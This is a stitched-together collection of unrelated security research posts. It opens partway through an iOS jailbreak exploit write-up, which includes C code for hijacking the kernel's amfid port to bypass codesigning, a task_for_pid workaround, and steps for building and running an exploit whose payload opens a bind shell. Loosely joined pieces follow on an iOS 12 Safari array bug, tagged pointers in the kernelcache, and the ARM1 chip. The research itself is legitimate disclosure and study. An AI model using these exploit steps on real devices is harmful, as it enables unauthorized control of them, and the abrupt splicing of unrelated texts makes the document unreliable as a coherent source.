The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.
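
A sketch of the re-registration itself, assuming we already have unsandboxed root code execution and the host-priv port; HOST_AMFID_PORT is taken from XNU’s host_special_ports.h, and the message forwarding that completes the triangle is omitted:

#include <mach/mach.h>

#ifndef HOST_AMFID_PORT
#define HOST_AMFID_PORT 18   // from XNU's host_special_ports.h (assumed unchanged)
#endif

// Allocate a port we control and register it as the kernel's amfid port.
// Codesigning validation requests then arrive on this port; we craft the reply
// and relay it through the real amfid so the kernel's sender check still passes.
static kern_return_t register_fake_amfid(mach_port_t host_priv, mach_port_t *fake_amfid) {
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, fake_amfid);
    mach_port_insert_right(mach_task_self(), *fake_amfid, *fake_amfid,
                           MACH_MSG_TYPE_MAKE_SEND);
    return host_set_special_port(host_priv, HOST_AMFID_PORT, *fake_amfid);
}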

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
  5. Unsandboxed code execution, the host-priv port, and the ability to crash a task_for_pid-allow process can be combined to build a task_for_pid workaround. (The workaround is: call host_set_exception_ports to set a new host-level exception handler, then crash the task_for_pid-allow process to receive its task port and execute code with the entitlement.)

In app extensions:

  1. App extensions that share an application group can communicate using Mach messages, despite the documentation suggesting that communication between the host app and the app extension should be impossible.

Recommended fixes and mitigations

I recommend the following fixes, roughly in order of importance:

  1. Only deallocate Mach ports in the launchd service routines when returning KERN_SUCCESS. This will fix the Mach port replacement vulnerability.
  2. Close the task_threads loophole allowing a non-platform binary to use the task port of a platform binary to achieve code execution.
  3. Fix crashing issues in ReportCrash.
  4. The set of Mach services reachable from within the container sandbox should be minimized. I do not see a legitimate reason for most iOS apps to communicate with ReportCrash or SafetyNet.
  5. As many processes as possible should be sandboxed. I’m not sure whether druid needs to be unsandboxed to function properly, but if not, it should be placed in an appropriate sandbox.
  6. Dead code should be eliminated. SafetyNet does not seem to be performing its intended functionality. If it is no longer needed, it should probably be removed.
  7. Close the host_set_exception_ports-based task_for_pid workaround. For example, consider whether it’s worth restricting host_set_exception_ports to root or restricting the usability of the host-priv port under some configurations. This violates the elegant capabilities-based design of Mach, but host_set_exception_ports might be a promising target for abuse.
  8. Consider whether it’s worth adding task_conversion_eval to task_inspect_t.

Running blanket

Blanket should work on any device running iOS 11.2.6.

  1. Download the project:
    git clone https://github.com/bazad/blanket
    cd blanket
    
  2. Download and build the threadexec library, which is required for blanket to inject code in processes and tasks:
    git clone https://github.com/bazad/threadexec
    cd threadexec
    make ARCH=arm64 SDK=iphoneos EXTRA_CFLAGS='-mios-version-min=11.1 -fembed-bitcode'
    cd ..
    
  3. Download Jonathan Levin’s iOS binpack, which contains the binaries that will be used by the bind shell. If you change the payload to do something else, you won’t need the binpack.
    mkdir binpack
    curl http://newosxbook.com/tools/binpack64-256.tar.gz | tar -xf- -C binpack
    
  4. Open Xcode and configure the project. You will need to change the signing identifier and specify a custom application group entitlement.
  5. Edit the file headers/config.h and change APP_GROUP to whatever application group identifier you specified earlier.

After that, you should be able to build and run the project on the device.

If blanket is successful, it will run the payload binary (source in blanket_payload/blanket_payload.c), which by default spawns a bind shell on port 4242. You can connect to that port with netcat and run arbitrary shell commands.

Credits

Many thanks to Ian Beer and Jonathan Levin for their excellent iOS security and internals research.

Timeline

Apple assigned the Mach port replacement vulnerability in launchd CVE-2018-4280, and it was patched in iOS 11.4.1 and macOS 10.13.6 on July 9.

Serious bug: Array state will be cached in iOS 12 Safari.

There is a problem with Array value state in the newly released iOS 12 Safari. For example, consider code like this:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>iOS 12 Safari bugs</title>
    <script type="text/javascript">
    window.addEventListener("load", function ()
    {
        let arr = [1, 2, 3, 4, 5];
        alert(arr.join());

        document.querySelector("button").addEventListener("click", function ()
        {
            arr.reverse();
        });
    });
    </script>
</head>
<body>
    <button>Array.reverse()</button>
    <p style="color:red;">test: click button and refresh page, code:</p>
</body>
</html>

It’s definitely a BUG! And it’s a very serious bug.

In my testing, the bug is due to an optimization of array initializers in which all values are primitive literals. For example, () => [1, null, 'x'] will return such arrays, and all of the returned arrays point to the same memory address; some methods like toString() are also memoized. Normally, any mutating operation on such an array will copy it to an individual memory region and link to that instead, the so-called copy-on-write technique (https://en.wikipedia.org/wiki/Copy-on-write).

The reverse() method mutates the array, so it should trigger CoW. Unfortunately, it currently doesn’t, which causes the bug.

On the other hand, methods which do not modify the array should not trigger CoW, and I found that even a.fill(value, 0, 0) or a.copyWithin(index, 0, 0) won’t trigger CoW, because such calls don’t really mutate the array. But I noticed that a.slice() WILL trigger CoW. So I guess the real cause of this bug may be that someone accidentally swapped the handling of slice and reverse.

I’ve added a demo page; try it in iOS 12 Safari: https://cdn.miss.cat/demo/ios12-safari-bug.html

Thanks.

Analyzing the iOS 12 kernelcache’s tagged pointers

 

Not long after the iOS 12 developer beta was released, I started analyzing the new kernelcaches in IDA to look for interesting changes. I immediately noticed that ida_kernelcache, my kernelcache analysis toolkit, was failing on the iPhone 6 Plus kernelcache: it appeared that certain segments, notably the prelink segments like __PRELINK_TEXT, were empty. Even stranger, when I started digging around the kernelcache, I noticed that the pointers looked bizarre, starting with 0x0017 instead of the traditional 0xffff.

It appears that Apple may be making significant changes to the iOS kernelcache on some devices, including abandoning the familiar split-kext design in favor of a monolithic Mach-O and introducing some form of static pointer tagging, most likely as a space-saving optimization. In this post I’ll describe some of the changes I’ve found and share my analysis of the tagged pointers.

The new kernelcache format

The iOS 12 beta kernelcache comes in a new format for some devices. In particular, if you look at build 16A5308e on the iPhone 6 Plus (iPhone7,1), you’ll notice a few differences from iOS 11 kernelcaches:

  • The __TEXT, __DATA_CONST, __TEXT_EXEC, __DATA, and __LINKEDIT segments are much bigger due to the integration of the corresponding segments from the kexts.
  • There are several new sections:
    • __TEXT.__fips_hmacs
    • __TEXT.__info_plist
    • __TEXT.__thread_starts
    • __TEXT_EXEC.initcode
    • __DATA.__kmod_init, which is the combination of the kexts’ __mod_init_func sections.
    • __DATA.__kmod_term, which is the combination of the kexts’ __mod_term_func sections.
    • __DATA.__firmware
    • __BOOTDATA.__data
    • __PRELINK_INFO.__kmod_info
    • __PRELINK_INFO.__kmod_start
  • The segments __PRELINK_TEXT, __PLK_TEXT_EXEC, __PRELINK_DATA, and __PLK_DATA_CONST are now 0 bytes long.
  • The prelink info dictionary in the section __PRELINK_INFO.__info no longer has the _PrelinkLinkKASLROffsets and _PrelinkKCID keys; only the _PrelinkInfoDictionary key remains.
  • There is no symbol information.

This new kernelcache is laid out as follows:

__TEXT.HEADER                 fffffff007004000 - fffffff007008c60  [  19K ]
__TEXT.__const                fffffff007008c60 - fffffff007216c18  [ 2.1M ]
__TEXT.__cstring              fffffff007216c18 - fffffff007448d11  [ 2.2M ]
__TEXT.__os_log               fffffff007448d11 - fffffff007473d6c  [ 172K ]
__TEXT.__fips_hmacs           fffffff007473d6c - fffffff007473d8c  [  32B ]
__TEXT.__thread_starts        fffffff007473d8c - fffffff007473fe4  [ 600B ]
__DATA_CONST.__mod_init_func  fffffff007474000 - fffffff007474220  [ 544B ]
__DATA_CONST.__mod_term_func  fffffff007474220 - fffffff007474438  [ 536B ]
__DATA_CONST.__const          fffffff007474440 - fffffff0076410a0  [ 1.8M ]
__TEXT_EXEC.__text            fffffff007644000 - fffffff0088893f0  [  18M ]
__TEXT_EXEC.initcode          fffffff0088893f0 - fffffff008889a48  [ 1.6K ]
__LAST.__mod_init_func        fffffff00888c000 - fffffff00888c008  [   8B ]
__KLD.__text                  fffffff008890000 - fffffff0088917cc  [ 5.9K ]
__KLD.__cstring               fffffff0088917cc - fffffff008891fa7  [ 2.0K ]
__KLD.__const                 fffffff008891fa8 - fffffff008892010  [ 104B ]
__KLD.__mod_init_func         fffffff008892010 - fffffff008892018  [   8B ]
__KLD.__mod_term_func         fffffff008892018 - fffffff008892020  [   8B ]
__KLD.__bss                   fffffff008892020 - fffffff008892021  [   1B ]
__DATA.__kmod_init            fffffff008894000 - fffffff0088965d0  [ 9.5K ]
__DATA.__kmod_term            fffffff0088965d0 - fffffff008898b28  [ 9.3K ]
__DATA.__data                 fffffff00889c000 - fffffff00890b6e0  [ 446K ]
__DATA.__sysctl_set           fffffff00890b6e0 - fffffff00890db28  [ 9.1K ]
__DATA.__firmware             fffffff00890e000 - fffffff0089867d0  [ 482K ]
__DATA.__common               fffffff008987000 - fffffff0089ed1c8  [ 408K ]
__DATA.__bss                  fffffff0089ee000 - fffffff008a1d6e8  [ 190K ]
__BOOTDATA.__data             fffffff008a20000 - fffffff008a38000  [  96K ]
__PRELINK_INFO.__kmod_info    fffffff008a38000 - fffffff008a38598  [ 1.4K ]
__PRELINK_INFO.__kmod_start   fffffff008a38598 - fffffff008a38b38  [ 1.4K ]
__PRELINK_INFO.__info         fffffff008a38b38 - fffffff008ae9613  [ 707K ]

Of particular consequence to those interested in reversing, the new kernelcaches are missing all symbol information:

% nm kernelcache.iPhone7,1.16A5308e.decompressed | wc -l
       0

So far, Apple hasn’t implemented this new format on all devices. The iPhone 7 (iPhone9,1) kernelcache still has split kexts and the traditional ~4000 symbols.

However, even on devices with the traditional split-kext layout, Apple does appear to be tweaking the format. The layout appears largely the same as before, but loading the kernelcache file into IDA 6.95 generates numerous warnings:

Loading prelinked KEXTs
FFFFFFF005928300: loading com.apple.iokit.IONetworkingFamily
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
FFFFFFF005929E00: loading com.apple.iokit.IOTimeSyncFamily
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
FFFFFFF00592D740: loading com.apple.kec.corecrypto
entries start past the end of the indirect symbol table (reserved1 field greater than the table size)
...

Thus, there appear to be at least 3 distinct kernelcache formats:

  • 11-normal: The format used on iOS 10 and 11. It has split kexts, untagged pointers, and about 4000 symbols.
  • 12-normal: The format used on iOS 12 beta for iPhone9,1. It is similar to 11-normal, but with some structural changes that confuse IDA 6.95.
  • 12-merged: The format used on iOS 12 beta for iPhone7,1. It is missing prelink segments, has merged kexts, uses tagged pointers, and, to the dismay of security researchers, is completely stripped.

Unraveling the mystery of the tagged pointers

I first noticed that the pointers in the kernelcache looked weird when I jumped to __DATA_CONST.__mod_init_func in IDA. In the iPhone7,1 16A5308e kernelcache, this section looks like this:

__DATA_CONST.__mod_init_func:FFFFFFF00748C000 ; Segment type: Pure data
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                 AREA __DATA_CONST.__mod_init_func, DATA, ALIGN=3
__DATA_CONST.__mod_init_func:FFFFFFF00748C000 off_FFFFFFF00748C000 DCQ 0x0017FFF007C95908
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                                         ; DATA XREF: sub_FFFFFFF00794B1F8+438o
__DATA_CONST.__mod_init_func:FFFFFFF00748C000                                         ; sub_FFFFFFF00794B1F8+4CC7w
__DATA_CONST.__mod_init_func:FFFFFFF00748C008                 DCQ 0x0017FFF007C963D0
__DATA_CONST.__mod_init_func:FFFFFFF00748C010                 DCQ 0x0017FFF007C99E14
__DATA_CONST.__mod_init_func:FFFFFFF00748C018                 DCQ 0x0017FFF007C9B7EC
__DATA_CONST.__mod_init_func:FFFFFFF00748C020                 DCQ 0x0017FFF007C9C854
__DATA_CONST.__mod_init_func:FFFFFFF00748C028                 DCQ 0x0017FFF007C9D6B4

This section should be filled with pointers to initialization functions; in fact, the values look almost like pointers, except the first 2 bytes, which should read 0xffff, have been replaced with 0x0017. Aside from that, the next 4 digits of the “pointer” are fff0, as expected, and the pointed-to values are all multiples of 4, as required for function pointers on arm64.

This pattern of function pointers was repeated in the other sections. For example, all of __DATA.__kmod_init and __DATA.__kmod_term have the same strange pointers:

__DATA.__kmod_init:FFFFFFF0088D4000 ; Segment type: Pure data
__DATA.__kmod_init:FFFFFFF0088D4000                 AREA __DATA.__kmod_init, DATA, ALIGN=3
__DATA.__kmod_init:FFFFFFF0088D4000                 DCQ 0x0017FFF007DD3DC0
__DATA.__kmod_init:FFFFFFF0088D4008                 DCQ 0x0017FFF007DD641C
...
__DATA.__kmod_init:FFFFFFF0088D6600                 DCQ 0x0017FFF0088C9E54
__DATA.__kmod_init:FFFFFFF0088D6608                 DCQ 0x0017FFF0088CA1D0
__DATA.__kmod_init:FFFFFFF0088D6610                 DCQ 0x0007FFF0088CA9E4
__DATA.__kmod_init:FFFFFFF0088D6610 ; __DATA.__kmod_init ends
__DATA.__kmod_term:FFFFFFF0088D6618 ; ===========================================================================
__DATA.__kmod_term:FFFFFFF0088D6618 ; Segment type: Pure data
__DATA.__kmod_term:FFFFFFF0088D6618                 AREA __DATA.__kmod_term, DATA, ALIGN=3
__DATA.__kmod_term:FFFFFFF0088D6618                 DCQ 0x0017FFF007DD3E68
__DATA.__kmod_term:FFFFFFF0088D6620                 DCQ 0x0017FFF007DD645C

However, if you look carefully, you’ll see that the last pointer of __kmod_init actually begins with 0x0007 rather than 0x0017. After seeing this, I began to suspect that this was some form of pointer tagging: that is, using the upper bits of the pointer to store additional information. Thinking that this tagging could be due to some new kernel exploit mitigation Apple was about to release, I decided to work out exactly what these tags mean to help understand what the mitigation might be.

My next step was to look for different types of pointers to see if there were any other possible tag values. I first checked the vtable for AppleKeyStoreUserClient. Since there are no symbols, you can find the vtable using the following trick:

  • Search for the “AppleKeyStoreUserClient” string in the Strings window.
  • Look for cross-references to the string from an initializer function. In our case, there’s only one xref, so we can jump straight there.
  • The “AppleKeyStoreUserClient” string is being loaded into register x1 as the first explicit argument in the call to OSMetaClass::OSMetaClass(char const*, OSMetaClass const*, unsigned int). The implicit this parameter passed in register x0 refers to the global AppleKeyStoreUserClient::gMetaClass, of type AppleKeyStoreUserClient::MetaClass, and its vtable is initialized just after the call. Follow the reference just after the call and you’ll be looking at the vtable for AppleKeyStoreUserClient::MetaClass.
  • From there, just look backwards to the first vtable before that one, and that’ll be AppleKeyStoreUserClient’s vtable.

This is what those vtables look like in the new kernelcache:

__DATA_CONST.__const:FFFFFFF0075D7738 ; AppleKeyStoreUserClient vtable
__DATA_CONST.__const:FFFFFFF0075D7738 off_FFFFFFF0075D7738 DCQ 0, 0, 0x17FFF00844BE00, 0x17FFF00844BE04, 0x17FFF007C99514
__DATA_CONST.__const:FFFFFFF0075D7738                                         ; DATA XREF: sub_FFFFFFF00844BE28+287o
__DATA_CONST.__const:FFFFFFF0075D7738                                         ; sub_FFFFFFF00844BE28+2C0o
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007C99528, 0x17FFF007C99530, 0x17FFF007C99540
...
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007D68674, 0x17FFF007D6867C, 0x17FFF007D686B4
__DATA_CONST.__const:FFFFFFF0075D7738                 DCQ 0x17FFF007D686EC, 0x47FFF007D686F4, 0
__DATA_CONST.__const:FFFFFFF0075D7D18 ; AppleKeyStoreUserClient::MetaClass vtable
__DATA_CONST.__const:FFFFFFF0075D7D18 off_FFFFFFF0075D7D18 DCQ 0, 0, 0x17FFF00844BDF8, 0x17FFF0084502D0, 0x17FFF007C9636C
__DATA_CONST.__const:FFFFFFF0075D7D18                                         ; DATA XREF: sub_FFFFFFF0084502D4+887o
__DATA_CONST.__const:FFFFFFF0075D7D18                                         ; sub_FFFFFFF0084502D4+8C0o
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C96370, 0x17FFF007C96378, 0x17FFF007C9637C
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C96380, 0x17FFF007C963A0, 0x17FFF007C96064
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x17FFF007C963AC, 0x17FFF007C963B0, 0x17FFF007C963B4
__DATA_CONST.__const:FFFFFFF0075D7D18                 DCQ 0x57FFF00844BE28, 0, 0

As you can see, most of the pointers still have the 0x0017 tag, but there are also 0x0047 and 0x0057 tags.

You may also notice that the last valid entry in the AppleKeyStoreUserClient::MetaClass vtable is 0x0057fff00844be28, which corresponds to the untagged pointer 0xfffffff00844be28, which is the address of the function sub_FFFFFFF00844BE28 that references AppleKeyStoreUserClient’s vtable. This supports the hypothesis that only the upper 2 bytes of each pointer are changed: the metaclass method at index 14 should be AppleKeyStoreUserClient::MetaClass::alloc, which needs to reference the AppleKeyStoreUserClient vtable when allocating a new instance of the class, and so everything fits together as expected.

At this point, I decided to gather more comprehensive information about the tagged pointers. I wrote a quick idapython script to search for 8-byte values that would be valid pointers except that the first 2 bytes were not 0xffff. Here’s the distribution of tagged pointers by section:

Python>print_tagged_pointer_counts_per_section()
__DATA_CONST.__mod_init_func           68
__DATA_CONST.__mod_term_func           67
__DATA_CONST.__const               211000
__TEXT_EXEC.__text                    372
__LAST.__mod_init_func                  1
__KLD.__const                          12
__KLD.__mod_init_func                   1
__KLD.__mod_term_func                   1
__DATA.__kmod_init                   1219
__DATA.__kmod_term                   1205
__DATA.__data                       12649
__DATA.__sysctl_set                  1168
__PRELINK_INFO.__kmod_info            179
__PRELINK_INFO.__kmod_start           180

I also counted how many untagged (i.e. normal) pointers I found in each section:

Python>print_untagged_pointer_counts_per_section()
__TEXT.HEADER                          38

Looking at those untagged pointers in IDA, it was clear that all of them were found in the kernelcache’s Mach-O header. Every other pointer in the entire kernelcache file was tagged.

Next I decided to look at how many copies of each tag were found in each section:

Python>print_tagged_pointer_counts_by_tag_per_section()
__TEXT.HEADER                    ffff (38)
__DATA_CONST.__mod_init_func     0007 (1), 0017 (67)
__DATA_CONST.__mod_term_func     0007 (1), 0017 (66)
__DATA_CONST.__const             0007 (2), 0017 (201446), 0027 (4006), 0037 (1694), 0047 (3056), 0057 (514), 0067 (85), 0077 (26), 0087 (46), 0097 (8), 00a7 (12), 00b7 (13), 00c7 (6), 00d7 (1), 00f7 (4), 0107 (4), 0117 (1), 0137 (1), 0147 (4), 0177 (1), 0187 (3), 0197 (1), 01c7 (3), 01e7 (1), 01f7 (8), 0207 (3), 0227 (32), 02a7 (1), 02e7 (8), 0317 (1), 0337 (1), 0477 (1), 04e7 (2), 0567 (1), 0b27 (1), 15d7 (1), 1697 (1), 21d7 (1)
__TEXT_EXEC.__text               0007 (133), 0017 (11), 00a7 (180), 0107 (3), 0357 (1), 03b7 (1), 03e7 (1), 05e7 (1), 0657 (1), 0837 (1), 0bd7 (1), 0d97 (1), 0e37 (1), 1027 (1), 12a7 (1), 1317 (1), 1387 (1), 1417 (1), 1597 (1), 1687 (1), 18b7 (1), 18d7 (1), 1927 (1), 19c7 (1), 19f7 (1), 1ad7 (1), 1c87 (1), 1ce7 (1), 1da7 (1), 1eb7 (1), 2077 (1), 2777 (1), 2877 (1), 2987 (1), 29b7 (1), 2a27 (1), 2a37 (1), 2aa7 (1), 2ab7 (1), 2bd7 (1), 2cf7 (1), 32b7 (1), 3367 (1), 3407 (1), 3417 (1), 3567 (1), 3617 (1), 37c7 (1), 3cb7 (1)
__LAST.__mod_init_func           0007 (1)
__KLD.__const                    0007 (1), 0017 (11)
__KLD.__mod_init_func            0007 (1)
__KLD.__mod_term_func            0007 (1)
__DATA.__kmod_init               0007 (1), 0017 (1218)
__DATA.__kmod_term               0007 (1), 0017 (1204)
__DATA.__data                    0007 (3), 0017 (7891), 001f (23), 0027 (2326), 002f (6), 0037 (1441), 003f (1), 0047 (74), 0057 (306), 0067 (22), 0077 (77), 007f (3), 0087 (98), 0097 (15), 00a7 (23), 00b7 (13), 00bf (1), 00c7 (13), 00d7 (5), 00e7 (6), 00f7 (15), 0107 (1), 0117 (5), 0127 (7), 0137 (8), 0147 (1), 0167 (4), 0177 (2), 017f (89), 0187 (19), 018f (19), 0197 (6), 019f (5), 01a7 (2), 01af (1), 01b7 (2), 01bf (1), 01c7 (3), 01cf (4), 01d7 (1), 01e7 (1), 0207 (1), 0217 (4), 0247 (2), 025f (1), 0267 (2), 0277 (2), 0297 (1), 02a7 (1), 02b7 (2), 02c7 (1), 02d7 (1), 02e7 (1), 02ff (4), 0307 (14), 030f (2), 0317 (1), 031f (1), 0327 (1), 032f (1), 0337 (2), 0357 (2), 0367 (8), 0377 (1), 03c7 (3), 03cf (1), 03d7 (1), 0417 (1), 0427 (1), 0447 (1), 047f (1), 048f (1), 0497 (1), 04a7 (1), 04c7 (1), 04cf (1), 04d7 (2), 0517 (2), 052f (1), 0547 (1), 05f7 (1), 0607 (1), 060f (1), 0637 (1), 0667 (1), 06b7 (1), 0787 (1), 07cf (1), 08ff (1), 097f (1), 09bf (1), 09f7 (5), 0a87 (1), 0b97 (1), 0ba7 (1), 0cc7 (1), 1017 (1), 117f (1), 1847 (1), 2017 (1), 2047 (1), 2097 (1), 2817 (1), 2c37 (1), 306f (1), 33df (1)
__DATA.__sysctl_set              0007 (1), 0017 (1167)
__PRELINK_INFO.__kmod_info       0007 (1), 0017 (178)
__PRELINK_INFO.__kmod_start      0007 (1), 0017 (179)

While studying the results, it became obvious that the distribution of tags across the 2-byte tag space (0x0000 to 0xffff) was not uniform: most of the tags seemed to use 0x0017, and almost all the tags started with the first digit 0. Additionally, almost all tags ended in 7, and the rest ended in f; no tags ended in any other digit.

I next examined whether there was a pattern to what each tagged pointer referenced, under the theory that the tags might describe the type of referred object. I wrote a script to print the section being referenced by one tagged pointer chosen at random for each tag. Unfortunately, the results didn’t offer any particularly illuminating insights:

Python>print_references_for_tagged_pointers()
0007       149    fffffff007ff5380 __TEXT_EXEC.__text               ->  fffffff007ff53c8 __TEXT_EXEC.__text
0017    213438    fffffff0074c39d0 __DATA_CONST.__const             ->  fffffff00726d80e __TEXT.__cstring
001f        23    fffffff00893c584 __DATA.__data                    ->  fffffff00870956c __TEXT_EXEC.__text
0027      6332    fffffff007639418 __DATA_CONST.__const             ->  fffffff007420e84 __TEXT.__cstring
002f         6    fffffff0089183f4 __DATA.__data                    ->  fffffff0080a11f8 __TEXT_EXEC.__text
0037      3135    fffffff0089010e0 __DATA.__data                    ->  fffffff008a0dff0 __DATA.__common
003f         1    fffffff008937f24 __DATA.__data                    ->  fffffff008520d44 __TEXT_EXEC.__text
0047      3130    fffffff00757b0d0 __DATA_CONST.__const             ->  fffffff008149d68 __TEXT_EXEC.__text
0057       820    fffffff007490b08 __DATA_CONST.__const             ->  fffffff0077470e0 __TEXT_EXEC.__text
0067       107    fffffff00764b980 __DATA_CONST.__const             ->  fffffff00888d8b4 __TEXT_EXEC.__text
...

Finally, while looking at the examples of various tags given by the previous script, I noticed a pattern: 0x0017 seemed to be found in the middle of sequences of pointers, while other tags appeared at the ends of sequences, when the following value was not a pointer. On further inspection, the second-to-last digit seemed to suggest how many (8-byte) words to skip before you’d get to the next tagged pointer: 0x0017 meant the following value was a pointer, 0x0027 meant the value after next was a pointer, 0x0037 meant skip 2 values, etc.

After more careful analysis, I discovered that this pattern held for all tags I manually inspected:

  • The tag 0x0007 was usually found at the end of a section.
  • The tag 0x0017 was always directly followed by another pointer.
  • The tag 0x001f was followed by a pointer after 4 intermediate bytes.
  • The tag 0x0027 was followed by a pointer after 8 bytes.
  • The tag 0x0037 was followed by a pointer after 16 bytes.

Extrapolating from these points, I derived the following relation for tagged pointers: For a tagged pointer P at address A, the subsequent pointer will occur at address A + ((P >> 49) & ~0x3).
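
Expressed as a quick Python sketch of the relation above (the helper names are mine):

def next_pointer_address(A, P):
    # For a tagged pointer value P stored at address A, the tag encodes
    # the distance to the next tagged pointer: A + ((P >> 49) & ~0x3).
    return A + ((P >> 49) & ~0x3)

def untag(P):
    # Restore the canonical kernel pointer by setting the top 2 bytes to 0xffff.
    return P | 0xffff000000000000

For a tag of 0x0017 the offset evaluates to 8, so the next pointer immediately follows; for 0x001f it evaluates to 12, matching the observation that the next pointer comes after 4 intermediate bytes.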

Even though tags as spans between pointers made little sense as a mitigation, I wrote a script to check whether all the tagged pointers in the kernelcache followed this pattern. Sure enough, all pointers except for those with tag 0x0007 were spot-on. The exceptions for 0x0007 tags occurred when there was a large gap between adjacent pointers. Presumably, if the gap is too large, 0x0007 is used even when the section has not ended to indicate that the gap cannot be represented by the tag.

Pointer tags as a kASLR optimization

So, the pointer tags describe the distance from each pointer to the next in the kernelcache, and there’s a formula that can compute the address of the next pointer given the address and tag of the previous one, kind of like a linked list. We understand the meaning, but not the purpose. Why did Apple implement this pointer tagging feature? Is it a security mitigation or something else?

Even though I initially thought that the tags would turn out to be a mitigation, the meaning of the tags as links between pointers doesn’t seem to support that theory.

In order to be a useful mitigation, you’d want the tag to describe properties of the referred-to value. For example, the tag might describe the length of the memory region referred to by the pointer so that out-of-bound accesses can be detected. Alternatively, the tag might describe the type of object being referred to so that functions can check that they are being passed pointers of the expected type.

Instead, these tags seem to describe properties of the address of the pointer rather than the value referred to by the pointer. That is, the tag indicates the distance to the pointer following this one regardless of to what or to where this pointer actually points. Such a property would be impossible to maintain at runtime: adding a pointer to the middle of a data structure would require searching backwards in memory for the pointer preceding it and updating that pointer’s tag. Thus, if this is a mitigation, it would be of very limited utility.

However, there’s a much more plausible theory. Buried among the other changes, the new kernelcache’s prelink info dictionary has been thinned down by removing the _PrelinkLinkKASLROffsets key. This key used to hold a data blob describing the offsets of all the pointers in the kernelcache that needed to be slid in order to implement kASLR. In the new kernelcache without the kASLR offsets, iBoot needs another way to identify where the pointers in the kernelcache are, and it just so happens that the pointer tags connect each pointer to the next in a linked list.

Thus, I suspect that the pointer tags are the new way for iBoot to find all the pointers in the kernelcache that need to be updated with the kASLR slide, and are not part of a mitigation at all. During boot, the tagged pointers would be replaced by untagged, slid pointers. This new implementation saves space by removing the large list of pointer offsets that used to be stored in the prelink info dictionary.
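
If that theory is right, the boot-time fixup could be as simple as walking the chain and rebasing each entry. Here is a hypothetical Python sketch of the idea; the byte-buffer interface, the chain start offset, and the end-of-chain handling are my assumptions, not iBoot’s actual implementation:

import struct

def slide_tagged_pointers(kernelcache, chain_start, kaslr_slide):
    # kernelcache: a mutable bytearray holding the kernelcache image.
    # chain_start: offset of the first tagged pointer in the chain.
    offset = chain_start
    while True:
        (value,) = struct.unpack_from('<Q', kernelcache, offset)
        # Replace the tagged pointer with the untagged, slid pointer.
        slid = ((value | 0xffff000000000000) + kaslr_slide) & 0xffffffffffffffff
        struct.pack_into('<Q', kernelcache, offset, slid)
        # The tag encodes the distance to the next tagged pointer.
        skip = (value >> 49) & ~0x3
        if skip == 0:
            # Tag 0x0007 computes to 0: end of the chain (or a gap too
            # large to encode), per the pattern observed above.
            break
        offset += skip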

Conclusion

The new kernelcache format and pointer tagging make analysis using IDA difficult, but now that I have a plausible theory for what’s going on, I plan on extending ida_kernelcache to make working with these new kernelcaches easier. Since the tags are probably not present at runtime, it should be safe to replace all the tagged pointers with their untagged values. This will allow IDA to restore all the cross-references broken by the tags. Unfortunately, the loss of symbol information will definitely make analysis more difficult. Future versions of ida_kernelcache may have to incorporate known symbol lists or parse the XNU source to give meaningful names to labels.
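
For instance, untagging a single pointer in the IDA database might look something like this hedged sketch (not ida_kernelcache’s actual code):

import idc

def untag_pointer(ea):
    # Replace a tagged pointer with its untagged value so that IDA can
    # resolve the cross-reference it encodes.
    value = idc.get_qword(ea)
    untagged = value | 0xffff000000000000
    if (value >> 48) != 0xffff and idc.get_segm_name(untagged):
        idc.patch_qword(ea, untagged)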

Reverse engineering the ARM1, ancestor of the iPhone’s processor

Almost every smartphone uses a processor based on the ARM1 chip created in 1985. The Visual ARM1 simulator shows what happens inside the ARM1 chip as it runs; the result (below) is fascinating but mysterious.[1] In this article, I reverse engineer key parts of the chip and explain how they work, bridging the gap between the puzzling flashing lines in the simulator and what the chip is actually doing. I describe the overall structure of the chip and then descend to the individual transistors, showing how they are built out of silicon and work together to store and process data. After reading this article, you can look at the chip’s circuits and understand the data they store.

Screenshot of the Visual ARM1 simulator, showing the activity inside the ARM1 chip as it executes a program.

Overview of the ARM1 chip

